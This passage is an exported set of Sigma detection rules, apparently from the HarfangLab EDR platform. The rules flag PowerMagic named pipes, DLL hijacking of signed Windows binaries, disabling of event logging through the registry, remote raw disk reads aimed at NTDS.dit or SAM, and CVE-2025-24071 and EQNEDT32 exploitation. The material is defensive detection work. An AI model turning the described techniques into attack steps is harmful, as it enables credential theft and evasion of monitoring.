"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/bad-magic-apt/109087/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_powermagic_named_pipes_created.yml",
"content": "title: PowerMagic Malware Named Pipes Created\nid: ab33962d-497b-42af-9f9a-0096d48d2791\ndescription: |\n Detects the creation of a Named Pipe pertaining to the PowerMagic malware.\n PowerMagic is a Russian-developed espionage malware, that uses named pipes to communicate locally between its different components.\n Adversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\n It is recommended to analyze actions taken by the process creating the named pipe and isolate infected systems if necessary.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/03/24\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.PowerMagic\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\PipeMd'\n - '\\PipeCrDtMd'\n - '\\PipeDtMd'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ab33962d-497b-42af-9f9a-0096d48d2791",
"rule_name": "PowerMagic Malware Named Pipes Created",
"rule_description": "Detects the creation of a Named Pipe pertaining to the PowerMagic malware.\nPowerMagic is a Russian-developed espionage malware, that uses named pipes to communicate locally between its different components.\nAdversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\nIt is recommended to analyze actions taken by the process creating the named pipe and isolate infected systems if necessary.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ab699571-31ab-4f50-b1cf-ec688a7ffea1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586522Z",
"creation_date": "2026-03-23T11:45:34.586526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586534Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dxpserver.yml",
"content": "title: DLL Hijacking via dxpserver.exe\nid: ab699571-31ab-4f50-b1cf-ec688a7ffea1\ndescription: |\n Detects potential Windows DLL Hijacking via dxpserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxpserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\msi.dll'\n - '\\PROPSYS.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ab699571-31ab-4f50-b1cf-ec688a7ffea1",
"rule_name": "DLL Hijacking via dxpserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dxpserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ab743be0-3d7d-4e52-9134-5b3fc6ca87f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624624Z",
"creation_date": "2026-03-23T11:45:34.624626Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624630Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1562/002/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_002_autologger_sessions_disabled.yml",
"content": "title: AutoLogger Session Disabled\nid: ab743be0-3d7d-4e52-9134-5b3fc6ca87f8\ndescription: |\n Detects Windows Event sources such as EventLog and Defender being disabled via registry.\n Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.\n It is recommended to investigate the process responsible for the registry modification to determine its legitimacy and to analyze possible malicious actions following this alert.\nreferences:\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1562/002/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/09/06\nmodified: 2025/12/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-*\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\Defender*\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-*\\{????????-????-????-????-????????????}\\Enabled'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\Defender*\\{????????-????-????-????-????????????}\\Enabled'\n Details: 'DWORD (0x00000000)'\n\n exclusion_defender:\n - ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - ProcessImage: '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessParentImage: '?:\\WINDOWS\\system32\\services.exe'\n\n exclusion_tiworker:\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application\\{????????-????-????-????-????????????}\\Enabled'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System\\{????????-????-????-????-????????????}\\Enabled'\n ProcessCommandLine:\n - '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - '?:\\WINDOWS\\winsxs\\x86_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_wevtutil:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application\\{????????-????-????-????-????????????}\\Enabled'\n ProcessCommandLine|contains:\n - 'wevtutil.exe * ?:\\WINDOWS\\system32\\drivers\\\\*.man'\n - 'wevtutil.exe * ?:\\ProgramData\\\\*.man'\n - 'wevtutil.exe * ?:\\Program Files\\\\*.man'\n - 'wevtutil.exe * ?:\\Program Files (x86)\\\\*.man'\n - 'wevtutil.exe * ?:\\WindowsAzure\\GuestAgent_*\\AzureEvents.man'\n - 'wevtutil.exe * ?:\\WindowsAzure\\Packages_*\\AzureEvents.man'\n - 'wevtutil.exe * ?:\\WindowsAzure\\Packages\\GuestAgent\\AzureEvents.man'\n\n exclusion_sentinelone:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System\\{????????-????-????-????-????????????}\\Enabled'\n ProcessCommandLine: '?:\\Windows\\system32\\wevtutil.exe install-manifest ?:\\Windows\\system32\\drivers\\SentinelOne\\\\*\\SentinelMessages.man'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ab743be0-3d7d-4e52-9134-5b3fc6ca87f8",
"rule_name": "AutoLogger Session Disabled",
"rule_description": "Detects Windows Event sources such as EventLog and Defender being disabled via registry.\nAdversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.\nIt is recommended to investigate the process responsible for the registry modification to determine its legitimacy and to analyze possible malicious actions following this alert.\n",
"rule_creation_date": "2024-09-06",
"rule_modified_date": "2025-12-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abaa5c6c-d4cb-43c4-a0cb-af78f30bbc52",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097176Z",
"creation_date": "2026-03-23T11:45:34.097178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097182Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/al3x_n3ff/status/1947692990874718377",
"https://github.com/Pennyw0rth/NetExec/blob/main/nxc/data/ntds-dump-raw/ntds-dump-raw.ps1",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_remote_raw_device_access_via_powershell.yml",
"content": "title: Remote Raw Device Access via Powershell\nid: abaa5c6c-d4cb-43c4-a0cb-af78f30bbc52\ndescription: |\n Detects a remote raw device access using PowerShell.\n Accessing raw devices on a remote computer using PowerShell is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\n This kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\n If abused, it can lead to privilege escalation, credential theft, or complete system compromise.\n It is recommended to check the PowerShell script linked to the process and pivot on the source IP for suspicious activities.\nreferences:\n - https://x.com/al3x_n3ff/status/1947692990874718377\n - https://github.com/Pennyw0rth/NetExec/blob/main/nxc/data/ntds-dump-raw/ntds-dump-raw.ps1\n - https://attack.mitre.org/techniques/T1006/\ndate: 2025/07/23\nmodified: 2025/10/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - classification.Windows.Source.RawDeviceAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: raw_device_access\ndetection:\n selection:\n Device: '\\Device\\Harddisk?\\DR?'\n ProcessProcessName:\n - 'Powershell.exe'\n - 'wsmprovhost.exe'\n - 'winrshost.exe'\n\n selection_remote_thread:\n SessionLogonType: 3 # Network Session\n\n selection_remote_proc:\n ProcessSessionLogonType: 3 # Network Session\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abaa5c6c-d4cb-43c4-a0cb-af78f30bbc52",
"rule_name": "Remote Raw Device Access via Powershell",
"rule_description": "Detects a remote raw device access using PowerShell.\nAccessing raw devices on a remote computer using PowerShell is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\nThis kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\nIf abused, it can lead to privilege escalation, credential theft, or complete system compromise.\nIt is recommended to check the PowerShell script linked to the process and pivot on the source IP for suspicious activities.\n",
"rule_creation_date": "2025-07-23",
"rule_modified_date": "2025-10-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abbb7ec2-813f-443e-a4d3-e37e6ed19e80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081452Z",
"creation_date": "2026-03-23T11:45:34.081454Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081459Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tar.yml",
"content": "title: DLL Hijacking via tar.exe\nid: abbb7ec2-813f-443e-a4d3-e37e6ed19e80\ndescription: |\n Detects potential Windows DLL Hijacking via tar.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tar.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\archiveint.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abbb7ec2-813f-443e-a4d3-e37e6ed19e80",
"rule_name": "DLL Hijacking via tar.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tar.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abc0e1a7-b33c-40ca-9b53-f5ffa6da9f45",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604538Z",
"creation_date": "2026-03-23T11:45:34.604541Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604548Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cti.monster/blog/2025/03/18/CVE-2025-24071.html",
"https://github.com/0x6rss/CVE-2025-24071_PoC",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "cve-2025-24071.yml",
"content": "title: Explorer CVE-2025-24071 NTLM Hash Leak Vulnerability Exploited\nid: abc0e1a7-b33c-40ca-9b53-f5ffa6da9f45\ndescription: |\n Detects the possible exploitation of CVE-2025-24071 related to Windows Explorer.\n Windows Explorer processes certain file types automatically upon extraction even if the file is never explicitly opened or clicked on by the user.\n Upon extraction of a '.library-ms' file, Windows Explorer attempts to resolve the SMB path automatically.\n This action triggers an implicit NTLM authentication handshake which can be abused for credential access or NTLM relay.\n It is recommended to investigate the created file for suspicious content and to search for suspicious authentications by the user following this alert.\nreferences:\n - https://cti.monster/blog/2025/03/18/CVE-2025-24071.html\n - https://github.com/0x6rss/CVE-2025-24071_PoC\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/03/20\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1187\n - attack.t1204.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Explorer\n - classification.Windows.Exploit.CVE-2025-24071\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '.library-ms'\n MinimalStackTrace|contains: 'zipfldr.dll'\n Image: '?:\\Windows\\Explorer.exe'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abc0e1a7-b33c-40ca-9b53-f5ffa6da9f45",
"rule_name": "Explorer CVE-2025-24071 NTLM Hash Leak Vulnerability Exploited",
"rule_description": "Detects the possible exploitation of CVE-2025-24071 related to Windows Explorer.\nWindows Explorer processes certain file types automatically upon extraction even if the file is never explicitly opened or clicked on by the user.\nUpon extraction of a '.library-ms' file, Windows Explorer attempts to resolve the SMB path automatically.\nThis action triggers an implicit NTLM authentication handshake which can be abused for credential access or NTLM relay.\nIt is recommended to investigate the created file for suspicious content and to search for suspicious authentications by the user following this alert.\n",
"rule_creation_date": "2025-03-20",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1187",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abd22bb7-da7f-471d-ae9e-e11e212e7008",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593934Z",
"creation_date": "2026-03-23T11:45:34.593938Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594002Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qprocess.yml",
"content": "title: DLL Hijacking via qprocess.exe\nid: abd22bb7-da7f-471d-ae9e-e11e212e7008\ndescription: |\n Detects potential Windows DLL Hijacking via qprocess.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qprocess.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\utildll.dll'\n - '\\winsta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abd22bb7-da7f-471d-ae9e-e11e212e7008",
"rule_name": "DLL Hijacking via qprocess.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qprocess.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ac265b31-0ca8-4933-8aea-121377e29f69",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090235Z",
"creation_date": "2026-03-23T11:45:34.090237Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090241Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_eqnedt32_network_connection.yml",
"content": "title: Office Equation Editor (EQNEDT32) Network Connection\nid: ac265b31-0ca8-4933-8aea-121377e29f69\ndescription: |\n Detects when EQNEDT32.EXE performs a network connection.\n This is a possible exploitation of CVE-2017-11882 related to EQNEDT32.EXE which will trigger the download of a payload from an external server.\n It is recommended to investigate the file opened by Office at the time of detection, and any suspicious actions taken by the detected process to determine if this action was legitimate.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/01/12\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Exploit.CVE-2017-11882\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n Image|endswith: '\\EQNEDT32.EXE'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ac265b31-0ca8-4933-8aea-121377e29f69",
"rule_name": "Office Equation Editor (EQNEDT32) Network Connection",
"rule_description": "Detects when EQNEDT32.EXE performs a network connection.\nThis is a possible exploitation of CVE-2017-11882 related to EQNEDT32.EXE which will trigger the download of a payload from an external server.\nIt is recommended to investigate the file opened by Office at the time of detection, and any suspicious actions taken by the detected process to determine if this action was legitimate.\n",
"rule_creation_date": "2021-01-12",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ac406f1f-081b-4df3-b466-c4448d600409",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
